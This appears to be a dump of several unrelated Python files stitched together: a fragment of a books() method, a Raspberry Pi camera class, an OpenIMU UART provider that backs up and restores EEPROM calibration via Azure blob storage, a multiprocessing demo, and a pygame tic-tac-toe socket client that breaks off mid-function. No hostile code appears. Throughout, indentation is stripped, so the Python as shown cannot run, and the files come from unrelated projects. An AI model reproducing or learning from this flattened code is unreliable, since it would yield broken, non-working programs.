def books(self, **k):
data = self.data_extractor.get_books()
annotations = self.annotations(tag="bm.quotation")
annotations_count = {}
key = lambda a: a.BookId
for bookId, group in itertools.groupby(
sorted(annotations, key=key), key=key
):
annotations_count[bookId] = len(list(group))
for item in data:
item.AnnotationsCount = annotations_count.get(item.OID, 0 )
return sorted(data, key=lambda item: -item.AnnotationsCount)
|
cameraClass.py
|
import cv2
import numpy as np
from time import sleep
from threading import Thread
class cameraClassPi:
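    """Raspberry Pi camera wrapper: configures a 1280x720, 32 fps PiCamera,
    starts a live preview, and exposes capture/stop helpers."""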
def __init__(self):
from picamera import PiCamera
from picamera.array import PiRGBArray
# initialize the camera and stream
self.camera = PiCamera()
#self.camera.sensor_mode = 1
self.camera.resolution = (1280,720)
self.camera.framerate = 32
self.shutter_speed = self.camera.exposure_speed
self.start()
self.rawCapture = PiRGBArray(self.camera)
def stopP(self):
# stop preview
self.camera.stop_preview()
def start(self):
        # start the camera preview (semi-transparent overlay)
self.camera.start_preview(alpha=160)
def capture(self, path):
self.camera.capture(path)
def stop(self):
        # release the camera
self.camera.close()
class cameraClassWeb:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update).start()
return self
def takePicture(self, path):
cv2.imwrite(path, self.frame)
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
uart_provider.py
|
import os
import re
import sys
import time
import json
import binascii
import math
# import asyncio
import datetime
import threading
import struct
from azure.storage.blob import BlockBlobService
from ...framework.utils import helper
from ...framework.utils import resource
from ..base import OpenDeviceBase
from ..configs.openimu_predefine import (
APP_STR, get_app_names
)
from ...framework.context import APP_CONTEXT
from ..decorator import with_device_message
from ...framework.configuration import get_config
from ..upgrade_workers import FirmwareUpgradeWorker
from ..upgrade_center import UpgradeCenter
class Provider(OpenDeviceBase):
'''
OpenIMU UART provider
'''
def __init__(self, communicator, *args):
super(Provider, self).__init__(communicator)
self.type = 'IMU'
self.server_update_rate = 50
self.is_logging = False
self.is_mag_align = False
self.bootloader_baudrate = 57600
self.device_info = None
self.app_info = None
self.app_config_folder = ''
self.parameters = None
self.enable_data_log = True
self.prepare_folders()
self.is_backup = False
self.is_restore = False
self.is_app_matched = False
self.connected = True
def prepare_folders(self):
'''
Prepare folders for data storage and configuration
'''
executor_path = resource.get_executor_path()
setting_folder_name = 'setting'
config_file_name = 'openimu.json'
data_folder_path = os.path.join(executor_path, 'data')
if not os.path.isdir(data_folder_path):
os.makedirs(data_folder_path)
# copy contents of app_config under executor path
self.setting_folder_path = os.path.join(
executor_path, setting_folder_name, 'openimu')
for app_name in get_app_names():
app_name_path = os.path.join(self.setting_folder_path, app_name)
app_name_config_path = os.path.join(
app_name_path, config_file_name)
if not os.path.isfile(app_name_config_path):
if not os.path.isdir(app_name_path):
os.makedirs(app_name_path)
app_config_content = resource.get_content_from_bundle(
setting_folder_name, os.path.join('openimu', app_name, config_file_name))
if app_config_content is None:
continue
with open(app_name_config_path, "wb") as code:
code.write(app_config_content)
def bind_device_info(self, device_access, device_info, app_info):
self._build_device_info(device_info)
self._build_app_info(app_info)
self.connected = True
return '# Connected {0} #\n\rDevice:{1} \n\rFirmware:{2}'\
.format('OpenIMU', device_info, app_info)
def _build_device_info(self, text):
'''
Build device info
'''
split_text = [x for x in text.split(' ') if x != '']
split_len = len(split_text)
pre_sn = split_text[3].split(':') if split_len == 4 else ''
serial_num = pre_sn[1] if len(pre_sn) == 2 else ''
self.device_info = {
'name': split_text[0],
'pn': split_text[1],
'firmware_version': split_text[2],
'sn': serial_num
}
def _build_app_info(self, text):
'''
Build app info
'''
# check if J1939 in text
app_version = text
can_indicator = '_J1939'
if can_indicator in app_version:
app_version = app_version.replace(can_indicator, '')
split_text = app_version.split(' ')
app_name = next(
(item for item in APP_STR if item in split_text), None)
if not app_name:
app_name = 'IMU'
self.is_app_matched = False
else:
self.is_app_matched = True
self.app_info = {
'app_name': app_name,
'version': text
}
def load_properties(self):
# Load config from user working path
local_config_file_path = os.path.join(os.getcwd(), 'openimu.json')
if os.path.isfile(local_config_file_path):
with open(local_config_file_path) as json_data:
self.properties = json.load(json_data)
return
# Load the openimu.json based on its app
app_name = self.app_info['app_name']
app_file_path = os.path.join(
self.setting_folder_path, app_name, 'openimu.json')
if not self.is_app_matched:
APP_CONTEXT.get_logger().warning(
('Failed to extract app version information from unit. The supported application list is {0}.').format(get_app_names()))
APP_CONTEXT.get_logger().warning(
                'To keep running, use IMU configuration as default.')
APP_CONTEXT.get_logger().warning(
                'You can choose to place your json file under the execution path if it is an unknown application.')
with open(app_file_path) as json_data:
self.properties = json.load(json_data)
def after_setup(self):
pass
def after_bootloader_switch(self):
self.communicator.serial_port.baudrate = self.bootloader_baudrate
def on_read_raw(self, data):
pass
def on_receive_output_packet(self, packet_type, data):
'''
Listener for getting output packet
'''
self.add_output_packet('stream', packet_type, data)
def get_log_info(self):
'''
Build information for log
'''
packet_rate = next(
(item['value'] for item in self.parameters if item['name'] == 'Packet Rate'), '100')
return {
"type": self.type,
"model": self.device_info['name'],
"logInfo": {
"pn": self.device_info['pn'],
"sn": self.device_info['sn'],
"sampleRate": packet_rate,
"appVersion": self.app_info['version'],
"imuProperties": json.dumps(self.properties)
}
}
def do_write_firmware(self, firmware_content):
upgrade_center = UpgradeCenter()
upgrade_center.register(
FirmwareUpgradeWorker(self.communicator, firmware_content))
upgrade_center.on('progress', self.handle_upgrade_process)
upgrade_center.on('error', self.handle_upgrade_error)
upgrade_center.on('finish', self.handle_upgrade_complete)
upgrade_center.start()
return upgrade_center.total
def get_device_connection_info(self):
return {
'modelName': self.device_info['name'],
'deviceType': self.type,
'serialNumber': self.device_info['sn'],
'partNumber': self.device_info['pn'],
'firmware': self.device_info['firmware_version']
}
# command list
def get_device_info(self, *args): # pylint: disable=invalid-name
'''
Get device information
'''
return {
'packetType': 'deviceInfo',
'data': [
{'name': 'Product Name',
'value': self.device_info['name']},
{'name': 'PN', 'value': self.device_info['pn']},
{'name': 'Firmware Version',
'value': self.device_info['firmware_version']},
{'name': 'SN', 'value': self.device_info['sn']},
{'name': 'App Version', 'value': self.app_info['version']}
]
}
def get_conf(self, *args): # pylint: disable=invalid-name
'''
Get json configuration
'''
return {
'packetType': 'conf',
'data': {
'outputs': self.properties['userMessages']['outputPackets'],
'inputParams': self.properties['userConfiguration']
}
}
@with_device_message
def get_params(self, *args): # pylint: disable=invalid-name
'''
Get all parameters
'''
command_line = helper.build_input_packet('gA')
result = yield self._message_center.build(command=command_line, timeout=3)
data = result['data']
if data:
self.parameters = data
yield {
'packetType': 'inputParams',
'data': data
}
yield {
'packetType': 'error',
'data': 'No Response'
}
@with_device_message
def get_param(self, params, *args): # pylint: disable=invalid-name
'''
        Get a parameter value
'''
command_line = helper.build_input_packet(
'gP', properties=self.properties, param=params['paramId'])
result = yield self._message_center.build(command=command_line)
data = result['data']
error = result['error']
if error:
yield {
'packetType': 'error',
'data': 'No Response'
}
if data:
yield {
'packetType': 'inputParam',
'data': data
}
yield {
'packetType': 'error',
'data': 'No Response'
}
@with_device_message
def set_params(self, params, *args): # pylint: disable=invalid-name
'''
        Update parameter values
'''
for parameter in params:
command_line = helper.build_input_packet(
'uP', properties=self.properties,
param=parameter['paramId'],
value=parameter['value'])
result = yield self._message_center.build(command=command_line)
packet_type = result['packet_type']
data = result['data']
if packet_type == 'error':
yield {
'packetType': 'error',
'data': {
'error': data
}
}
if data > 0:
yield {
'packetType': 'error',
'data': {
'error': data
}
}
yield {
'packetType': 'success',
'data': {
'error': 0
}
}
@with_device_message
def set_param(self, params, *args): # pylint: disable=invalid-name
'''
        Update parameter value
'''
try:
command_line = helper.build_input_packet(
'uP', properties=self.properties, param=params['paramId'], value=params['value'])
except:
yield {
'packetType': 'error',
'data': {
'error': params['paramId']
}
}
result = yield self._message_center.build(command=command_line)
error = result['error']
data = result['data']
if error:
yield {
'packetType': 'error',
'data': {
'error': data
}
}
yield {
'packetType': 'success',
'data': {
'error': data
}
}
@with_device_message
def reset_params(self, *args): # pylint: disable=unused-argument
'''
Reset params to default
'''
command_line = helper.build_input_packet('rD')
result = yield self._message_center.build(command=command_line, timeout=2)
error = result['error']
data = result['data']
if error:
yield {
'packetType': 'error',
'data': {
'error': error
}
}
yield {
'packetType': 'success',
'data': data
}
@with_device_message
def save_config(self, *args): # pylint: disable=unused-argument
'''
Save configuration
'''
command_line = helper.build_input_packet('sC')
result = yield self._message_center.build(command=command_line)
data = result['data']
error = result['error']
if data:
yield {
'packetType': 'success',
'data': data
}
yield {
'packetType': 'success',
'data': error
}
@with_device_message
def run_command(self, params, *args):
''' run raw command
'''
bytes_str_in_array = re.findall('([a-f|0-9|A-F]{2})', params)
command_line = bytes([int(item, 16) for item in bytes_str_in_array])
result = yield self._message_center.build(command=command_line, timeout=2)
error = result['error']
raw = result['raw']
if error:
yield {
'packetType': 'error',
'data': {
'error': 'Runtime Error',
'message': 'The device cannot response the command'
}
}
yield {
'packetType': 'success',
'data': raw
}
def mag_align_start(self, *args): # pylint: disable=unused-argument
'''
Start mag align action
'''
if not self.is_mag_align:
self.is_mag_align = True
thread = threading.Thread(
target=self.thread_do_mag_align, args=())
thread.start()
return {
'packetType': 'success'
}
@with_device_message
def thread_do_mag_align(self):
'''
Do mag align
'''
try:
command_line = helper.build_input_packet(
'ma', self.properties, 'start')
# self.communicator.write(command_line)
# result = self.get_input_result('ma', timeout=3)
result = yield self._message_center.build(command=command_line, timeout=3)
time.sleep(1)
has_result = False
while not has_result:
command_line = helper.build_input_packet(
'ma', self.properties, 'status')
result = yield self._message_center.build(command=command_line)
if not self.is_mag_align:
break
if result['data'] == [0]:
has_result = True
else:
time.sleep(0.5)
if not has_result:
return
command_line = helper.build_input_packet(
'ma', self.properties, 'stored')
result = yield self._message_center.build(command=command_line)
mag_value = dict()
if len(result['data']) > 0:
decoded_status = binascii.hexlify(bytes(result['data']))
mag_value = self.decode_mag_align_output(decoded_status)
else:
command_line = helper.build_input_packet(
'ma', self.properties, 'abort')
self.is_mag_align = False
# TODO: reset packet rate after operation successful
self.add_output_packet('stream', 'mag_status', {
'status': 'complete',
'value': mag_value
})
except Exception as ex: # pylint: disable=broad-except
APP_CONTEXT.get_logger().error(ex)
self.is_mag_align = False
self.add_output_packet('stream', 'mag_status', {
'status': 'error'
})
@with_device_message
def mag_align_abort(self, *args): # pylint: disable=invalid-name
'''
Abort mag align action
'''
self.is_mag_align = False
time.sleep(0.5)
command_line = helper.build_input_packet(
'ma', self.properties, 'abort')
result = yield self._message_center.build(command=command_line)
# print('mag abort result', result['data'])
if result['error']:
yield {
'packetType': 'error',
'data': {
'error': 1
}
}
else:
yield {
'packetType': 'success'
}
@with_device_message
def mag_align_save(self, *args): # pylint: disable=invalid-name
'''
        Save mag align result
'''
command_line = helper.build_input_packet(
'ma', self.properties, 'save')
# self.communicator.write(command_line)
# result = self.get_input_result('ma', timeout=1)
result = yield self._message_center.build(command=command_line)
if result['error']:
yield {
'packetType': 'error',
'data': {
'error': 1
}
}
yield {
'packetType': 'success'
}
def decode_mag_align_output(self, value):
'''
decode mag align output
'''
hard_iron_x = dict()
hard_iron_y = dict()
soft_iron_ratio = dict()
soft_iron_angle = dict()
hard_iron_x['paramId'] = next(
(item['paramId'] for item in self.properties['userConfiguration']
if item.__contains__('argument') and item['argument'] == 'hard_iron_x'), None)
hard_iron_x['value'] = self.hard_iron_cal(value[16:20], 'axis')
hard_iron_x['name'] = 'Hard Iron X'
hard_iron_x['argument'] = 'hard_iron_x'
hard_iron_y['paramId'] = next(
(item['paramId'] for item in self.properties['userConfiguration']
if item.__contains__('argument') and item['argument'] == 'hard_iron_y'), None)
hard_iron_y['value'] = self.hard_iron_cal(value[20:24], 'axis')
hard_iron_y['name'] = 'Hard Iron Y'
hard_iron_y['argument'] = 'hard_iron_y'
soft_iron_ratio['paramId'] = next(
(item['paramId'] for item in self.properties['userConfiguration']
if item.__contains__('argument') and item['argument'] == 'soft_iron_ratio'), None)
soft_iron_ratio['value'] = self.hard_iron_cal(value[24:28], 'ratio')
soft_iron_ratio['name'] = 'Soft Iron Ratio'
soft_iron_ratio['argument'] = 'soft_iron_ratio'
soft_iron_angle['paramId'] = next(
(item['paramId'] for item in self.properties['userConfiguration']
if item.__contains__('argument') and item['argument'] == 'soft_iron_angle'), None)
soft_iron_angle['value'] = self.hard_iron_cal(value[28:32], 'angle')
soft_iron_angle['name'] = 'Soft Iron Angle'
soft_iron_angle['argument'] = 'soft_iron_angle'
output = [hard_iron_x, hard_iron_y, soft_iron_ratio, soft_iron_angle]
return output
def hard_iron_cal(self, value, data_type):
'''
convert hard iron value
'''
decoded_value = int(value, 16)
# print (decodedValue)
if data_type == 'axis':
if decoded_value > 2 ** 15:
new_decoded_value = (decoded_value - 2 ** 16)
return new_decoded_value / float(2 ** 15) * 8
else:
return decoded_value / float(2 ** 15) * 8
if data_type == 'ratio':
return decoded_value / float(2 ** 16 - 1)
if data_type == 'angle':
if decoded_value > 2 ** 15:
decoded_value = decoded_value - 2 ** 16
pi_value = 2 ** 15 / math.pi
return decoded_value / pi_value
pi_value = 2 ** 15 / math.pi
return decoded_value / pi_value
def upgrade_framework(self, file, *args): # pylint: disable=invalid-name
'''
upgrade framework
'''
# start a thread to do upgrade
if not self.is_upgrading:
self.is_upgrading = True
self._message_center.pause()
if self._logger is not None:
self._logger.stop_user_log()
thead = threading.Thread(
target=self.thread_do_upgrade_framework, args=(file,))
thead.start()
print("Upgrade OpenIMU firmware started at:[{0}].".format(
datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
return {
'packetType': 'success'
}
def backup_calibration(self, params):
'''
start a thread to backup
'''
if not self.is_backup:
self.is_backup = True
self.ans_platform.set_access_token(params['token'])
thread = threading.Thread(
target=self.thread_do_backup, args=())
thread.start()
return {
'packetType': 'success'
}
def restore_calibration(self, params):
'''
start a thread to restore
'''
# if not self.is_restore:
# self.is_restore = True
# self.ans_platform.set_access_token(params['token'])
# thread = threading.Thread(
# target=self.thread_do_restore, args=())
# thread.start()
return {
'packetType': 'success'
}
@with_device_message
def thread_do_backup(self):
'''
Do Calibration Backup
'''
# get current odr
packet_rate_param_index = 4
command_line = helper.build_input_packet(
'gP', properties=self.properties, param=packet_rate_param_index)
packet_rate_result = yield self._message_center.build(command=command_line)
if packet_rate_result['error']:
self.is_backup = False
self.add_output_packet('stream', 'backup_status', {
'status': 'fail'
})
return
# set quiet
command_line = helper.build_input_packet(
'uP', properties=self.properties, param=packet_rate_param_index, value=0)
result = yield self._message_center.build(command=command_line)
        if result['error']:
self.is_backup = False
self.add_output_packet('stream', 'backup_status', {
'status': 'fail'
})
return
file_name = self.device_info['sn']+'.bin' # todo: sn-yyyy-mm-dd-hhmmss
start = 0x0
read_size = 0x7E
max_length = 4096
file_write_size = 0
file_result = bytearray()
while file_write_size < max_length:
actual_read_size = read_size
plan_file_write_size = file_write_size + actual_read_size
if plan_file_write_size >= max_length:
actual_read_size = max_length - file_write_size
command_line = helper.build_read_eeprom_input_packet(
start, actual_read_size)
result = yield self._message_center.build(command=command_line)
if result['error']:
self.is_backup = False
self.add_output_packet('stream', 'backup_status', {
'status': 'fail'
})
break
data = result['data']
if plan_file_write_size >= max_length:
file_result.extend(data[0:actual_read_size])
else:
file_result.extend(data)
file_write_size += len(data)
start += actual_read_size
reserved_data = self._reserve_by_word(file_result)
self._write_to_file(file_name, reserved_data)
# restore odr
command_line = helper.build_input_packet(
'uP', properties=self.properties,
param=packet_rate_param_index,
value=packet_rate_result['data']['value'])
yield self._message_center.build(command=command_line)
def _reserve_by_word(self, data):
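        # Prepend a 16-bit erase counter (two zero bytes), copy the first
        # 0x284 bytes unchanged, then swap the two bytes of every remaining
        # 16-bit word.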
start_index = 0x284
reserved_data = bytearray()
reserved_data.extend([00, 00]) # append 16 bit count of erases
reserved_data.extend(data[0:start_index])
need_reserve = data[start_index:]
total_len = int((4095 - start_index)/2)
for i in range(total_len):
reserved_data.extend([need_reserve[i*2+1], need_reserve[i*2]])
return reserved_data
def _write_to_file(self, file_name, result):
# save to local path, backup/{device_type}/{file_name}
executor_path = resource.get_executor_path()
backup_folder_path = os.path.join(
executor_path, 'backup', 'openimu')
file_path = os.path.join(backup_folder_path, file_name)
if not os.path.isdir(backup_folder_path):
os.makedirs(backup_folder_path)
with open(file_path, 'wb') as file_stream:
file_stream.write(result)
stream = 'stream'
backup_status = 'backup_status'
status_complete = 'complete'
status_fail = 'fail'
try:
config = get_config()
account_name = config.AZURE_STORAGE_ACCOUNT
container_name = config.AZURE_STORAGE_BACKUP_CONTAINER
sas_token = self.ans_platform.get_sas_token()
if sas_token == '':
raise Exception('cannot get sas token')
self.block_blob_service = BlockBlobService(account_name=account_name,
sas_token=sas_token,
protocol='http')
self.block_blob_service.create_blob_from_path(container_name=container_name,
blob_name=file_name,
file_path=file_path)
except Exception as ex:
print('azure exception', ex)
self.is_backup = False
self.add_output_packet(stream, backup_status, {
'status': status_fail
})
return
# save to db
serial_num = self.device_info['sn']
save_result = self.ans_platform.save_backup_restult(
serial_num, file_name, 'IMU')
if save_result.__contains__('error'):
self.is_backup = False
self.add_output_packet(stream, backup_status, {
'status': status_fail
})
return
self.is_backup = False
self.add_output_packet(stream, backup_status, {
'status': status_complete,
'date': save_result['data']['lastBackupTime']
})
@with_device_message
def _unlock(self):
command_line = helper.build_read_eeprom_input_packet(0x100, 2)
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
self._restore_fail()
return
command_line = helper.build_unlock_eeprom_packet(result['data'])
unlock_result = yield self._message_center.build(command=command_line, timeout=2)
if unlock_result['error']:
self._restore_fail()
return
        print('unlock -- successful', unlock_result['data'])
@with_device_message
def thread_do_restore(self):
'''
Do Calibration Restore
'''
# 1.download bin from azure
file_name = self.device_info['sn']+'.bin'
content_data = bytearray()
executor_path = resource.get_executor_path()
backup_folder_path = os.path.join(
executor_path, 'backup', 'openimu')
file_path = os.path.join(backup_folder_path, file_name)
file = open(file_path, 'rb')
content_data = file.read()
file.close()
# 2.save odr, then set quiet
# get current odr
packet_rate_param_index = 4
command_line = helper.build_input_packet(
'gP', properties=self.properties, param=packet_rate_param_index)
packet_rate_result = yield self._message_center.build(command=command_line)
if packet_rate_result['error']:
self._restore_fail()
return
# set quiet
command_line = helper.build_input_packet(
'uP', properties=self.properties, param=packet_rate_param_index, value=0)
result = yield self._message_center.build(command=command_line)
if result['error']:
self._restore_fail()
return
# 3.do restore
# 3.1 unlock eeprom
command_line = helper.build_read_eeprom_input_packet(0x100, 2)
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
self._restore_fail()
return
command_line = helper.build_unlock_eeprom_packet(result['data'])
unlock_result = yield self._message_center.build(command=command_line, timeout=2)
if unlock_result['error']:
self._restore_fail()
return
        print('unlock -- successful', unlock_result['data'])
# 3.2 write eeprom
skip_range = [0x200, 0x284]
        sn_string = self._build_sn_string(content_data[0x200:0x204])
model_string = self._build_model_string(content_data[0x204:0x284])
can_write = self._clear_calibration_area()
if not can_write:
self._restore_fail()
return
can_write = self._write_calibration_from_data(content_data, skip_range)
if not can_write:
self._restore_fail()
return
can_write = self._write_sn_and_model_string(sn_string, model_string)
if not can_write:
self._restore_fail()
return
        print('write eeprom -- successful')
self._lock()
# 4.write operation result to db
# 5.restore odr
command_line = helper.build_input_packet(
'uP', properties=self.properties,
param=packet_rate_param_index,
value=packet_rate_result['data']['value'])
yield self._message_center.build(command=command_line)
self.is_restore = False
self.add_output_packet('stream', 'restore_status', {
'status': 'success'
})
def _build_sn_string(self, data_range):
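        # Rebuild the 4-byte serial-number field with the two bytes of each
        # 16-bit word swapped.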
data = []
start = 0
for _ in range(2):
if start == 4:
break
data.extend([
struct.unpack('B', data_range[start+1: start+2])[0],
struct.unpack('B', data_range[start: start+1])[0]
])
start += 2
return data
def _build_model_string(self, data_range):
end = [0]
data = []
for item in data_range:
if item == 0:
break
data.append(item)
data.extend(end)
return data
@with_device_message
def _clear_calibration_area(self):
start = 0
end = 4096
block_size = 20
write_offset = 0
while write_offset < end:
write_data = []
plan_write_offset = write_offset + block_size * 2
if plan_write_offset >= end:
plan_write_offset = end
block_size = int((plan_write_offset - write_offset)/2)
for _ in range(plan_write_offset - write_offset):
write_data.append(0xFF)
command_line = helper.build_write_eeprom_input_packet(
start, block_size, write_data)
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
yield False
write_offset = plan_write_offset
start += block_size
yield True
@with_device_message
def _write_sn_and_model_string(self, sn_string, model_string):
command_line = helper.build_write_eeprom_input_packet(
0x100, 2, sn_string)
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
yield False
command_line = helper.build_write_eeprom_input_packet(
0x104, len(model_string), self._build_16bit_data_range(model_string))
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
yield False
yield True
@with_device_message
def _write_calibration_from_data(self, data, skip_range):
end = 4096
block_size = 20
write_offset = 0
while write_offset < end:
plan_write_offset = write_offset + block_size * 2
if plan_write_offset >= end:
plan_write_offset = end
block_size = int((plan_write_offset - write_offset)/2)
# plan write range
plan_write_range = [write_offset, plan_write_offset]
# build a new range with skip range
new_range = self._build_calibration_write_range(
data, plan_write_range, skip_range)
for write_range in new_range:
command_line = helper.build_write_eeprom_input_packet(
int(write_range['start']/2),
int(write_range['length']/2),
write_range['data'])
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
yield False
yield True
def _build_calibration_write_range(self, content_data, plan_write_range, skip_range):
# range struct {'start': start, 'data': data, 'length': length}
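        # Split the planned write range around skip_range so the skipped area
        # (the SN/model strings, which are restored separately) is never
        # overwritten; the branches below cover the plan range ending inside,
        # starting inside, fully containing, or not touching the skip range.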
new_range = []
write_data = []
if plan_write_range[1] >= skip_range[0] and plan_write_range[1] <= skip_range[1]:
if plan_write_range[0] < skip_range[0]:
write_data.extend(
content_data[plan_write_range[0]: skip_range[0]])
new_range.append({'start': int(plan_write_range[0]/2),
'length': int((skip_range[0]-plan_write_range[0])/2),
'data': write_data})
if plan_write_range[0] >= skip_range[0] and plan_write_range[0] <= skip_range[1]:
if plan_write_range[1] > skip_range[1]:
write_data.extend(
content_data[skip_range[1]: plan_write_range[1]])
new_range.append({'start': int(skip_range[1]/2),
'length': int((plan_write_range[1] - skip_range[1])/2),
'data': write_data})
if plan_write_range[0] < skip_range[0] and skip_range[1] < plan_write_range[1]:
new_range.append({'start': int(plan_write_range[0]/2),
'length': int((skip_range[0] - plan_write_range[0])/2),
'data': content_data[plan_write_range[0]: skip_range[0]]})
new_range.append({'start': int(skip_range[1]/2),
'length': int((plan_write_range[1] - skip_range[1])/2),
'data': content_data[skip_range[1]: plan_write_range[1]]})
if plan_write_range[1] < skip_range[0] or plan_write_range[0] > skip_range[1]:
write_data.extend(
content_data[plan_write_range[0]: plan_write_range[1]])
new_range.append({'start': int(plan_write_range[0]/2),
'length': int((plan_write_range[1] - plan_write_range[0])/2),
'data': write_data})
return new_range
def _build_16bit_data_range(self, data_range):
data = []
for item in data_range:
data.extend(struct.pack('>H', item))
return data
def _build_reserve_data(self, data_range):
data = []
start = 0
for _ in range(int(len(data_range)/2)):
if start == len(data_range):
break
data.extend([
struct.unpack('B', data_range[start+1: start+2])[0],
struct.unpack('B', data_range[start: start+1])[0]
])
start += 2
return data
@with_device_message
def _lock(self):
# lock eeprom
command_line = helper.build_input_packet('LE')
result = yield self._message_center.build(command=command_line)
if result['error']:
self._restore_fail()
return
        print('lock eeprom -- successful', result['data'])
# software reset
command_line = helper.build_input_packet('SR')
yield self._message_center.build(command=command_line)
def _restore_fail(self):
self.is_restore = False
self.add_output_packet('stream', 'restore_status', {
'status': 'fail'
})
|
myfork.py
|
import time
from multiprocessing import Process
def f(name):
print('hello', name)
    print('I am the child process')
if __name__ == '__main__':
p = Process(target=f, args=('bob',))
p.start()
time.sleep(15)
    print('now executing the main process body')
|
tttclient.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 10 14:19:06 2020
This Tic-tac-toe game is the COMP-2100 Group 1 Final Project
Submitted to Prof. Othman, Salem
@author: Boonpeng, Pikulkaew (Pk)
@author: DiMarzio, Ariane
@author: Sajjad, Tania
This project uses PyGame for creating GUI
There are 2 types of games
1. Traditional Tic-tac-toe (X and O players)
- A row, a column, or a diagonal line must have the same sign.
2. Sum-of-15 Tic-tac-toe (Even number and Odd number players)
- The last player who makes a row, a column, or a diagonal line has the
sum of 15 will be the winner.
- Odd number player always goes first: 1, 3, 5, 7, 9
- Even number player: 2, 4, 6, 8
"""
import pygame
pygame.init()
#window width
windowWidth = 1200
#window height
windowHeight = 600
#sets window dimension
screen = pygame.display.set_mode((windowWidth, windowHeight))
#set window's title
pygame.display.set_caption('COMP-2100-09 Final Project Group 1: Tic-tac-toe Client')
#-----------------------------------------------------------------------------
#colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 138, 138)
#-----------------------------------------------------------------------------
#font setting for "select" text
selectText = pygame.font.Font(pygame.font.get_default_font(), 24)
#font for buttons
btnText = pygame.font.Font(pygame.font.get_default_font(), 40)
#stores game option; 1 for XO , 2 for number
gameOption = 0;
#stores player option; 1 for 1 player(not available), 2 for 2 players
playerOption = 0
#stores player 1's score
score1 = 0
#stores player 2's score
score2 = 0
#player 1 is X or Odd
player1 = ""
#player 2 is O or Even
player2 = ""
#global variables used when sending and receiving data from other user
playing= True
turn=True
numOfImg = 1
tradiCurrPlayer= 'x'
#grid setting for X and O
gridTradi = [[None]*3, [None]*3, [None]*3]
gridImg = pygame.image.load(r"assets\grid.png")
row = 0
col = 0
#grid setting for Odd and Even
gridNum = [0, 0, 0, 0, 0, 0, 0, 0, 0]
# 1 | 2 | 3
#---+---+---
# 4 | 5 | 6
#---+---+---
# 7 | 8 | 9
cell = 0
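#Illustrative sketch (not part of the original client logic): one way the
#Sum-of-15 win condition described in the module docstring could be tested
#against the flat gridNum list laid out above. A line wins when all three of
#its cells are filled and their values add up to 15.
def sumOf15Win(grid):
    lines = [(0, 1, 2), (3, 4, 5), (6, 7, 8),   # rows
             (0, 3, 6), (1, 4, 7), (2, 5, 8),   # columns
             (0, 4, 8), (2, 4, 6)]              # diagonals
    for a, b, c in lines:
        if grid[a] and grid[b] and grid[c] and grid[a] + grid[b] + grid[c] == 15:
            return True
    return False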
#------------------------------------------------------------------
gridImg = pygame.transform.scale(gridImg, (480,430))
#X and O game option button image
imgGame1 = pygame.image.load(r"assets\game1.png")
imgGame1 = pygame.transform.scale(imgGame1, (160,160))
#Odd and Even game option button image
imgGame2 = pygame.image.load(r"assets\game2.png")
imgGame2 = pygame.transform.scale(imgGame2, (160,160))
#1 player option button image
imgPlayer1 = pygame.image.load(r"assets\player1.png")
imgPlayer1 = pygame.transform.scale(imgPlayer1, (160,160))
#2 player option button image
imgPlayer2 = pygame.image.load(r"assets\player2.png")
imgPlayer2 = pygame.transform.scale(imgPlayer2, (160,160))
#loads x image
xImg = pygame.image.load(r"assets\x.png")
xImg = pygame.transform.scale(xImg, (80,80))
#loads o image
imgO = pygame.image.load(r"assets\o.png")
imgO = pygame.transform.scale(imgO, (80,80))
#loads winning lines
imgWinHon = pygame.image.load(r"assets\honWinLine.png")
imgWinHon = pygame.transform.scale(imgWinHon, (400,14))
imgWinVer = pygame.image.load(r"assets\verWinLine.png")
imgWinVer = pygame.transform.scale(imgWinVer, (14,400))
imgWinTopLeft = pygame.image.load(r"assets\topLeftWinLine.png")
imgWinTopLeft = pygame.transform.scale(imgWinTopLeft, (390,390))
imgWinTopRight = pygame.image.load(r"assets\topRightWinLine.png")
imgWinTopRight = pygame.transform.scale(imgWinTopRight, (390,390))
import threading
#creates a thread to communicate between users
def createThread(target):
thread=threading.Thread(target=target)
thread.daemon=True
thread.start()
import socket
HOST= '127.0.0.1'
PORT= 1542
#creates socket and socket connection
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
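# Illustrative helper (not in the original file): as inferred from sendData/
# receiveData below, the two clients exchange each move as a dash-separated
# ASCII string such as "615-55-True", with an extra field inserted when the
# move completed a winning line (e.g. "583-90-1.0-False"). _encode_move is a
# hypothetical name that only documents that format.
def _encode_move(x, y, playing, line_type=None):
    # line_type identifies which winning-line image to draw on the other side
    parts = [x, y] if line_type is None else [x, y, line_type]
    parts.append(playing)
    return '-'.join(str(p) for p in parts).encode()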
#method to receive data from the other user
def receiveData():
global turn, playing, xImg, score1, gameOption, numOfImg, btnText
#infinite loop for receive any data sent
while True:
data= sock.recv(1024).decode()
print(data)
data=data.split("-")
x,y=int(float(data[0])),int(float(data[1]))
turn=True
if x>585 and x<975 and y>34 and y<415:
#X and O game output for other player's move
if gameOption==1:
screen.blit(xImg, (x, y))
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Your turn!", True, RED), (60, 525))
#num output for other player's move
elif gameOption==2:
imgNum = pygame.image.load('assets\\' + str(numOfImg) + ".png")
imgNum = pygame.transform.scale(imgNum, (80,80))
if x > 585 and x < 715 and y > 35 and y < 155:
cell = 0
elif x > 715 and x <= 850 and y > 35 and y <= 155:
cell = 1
elif x > 850 and x <= 975 and y > 35 and y <= 155:
cell = 2
elif x > 585 and x <= 715 and y > 155 and y <= 300:
cell = 3
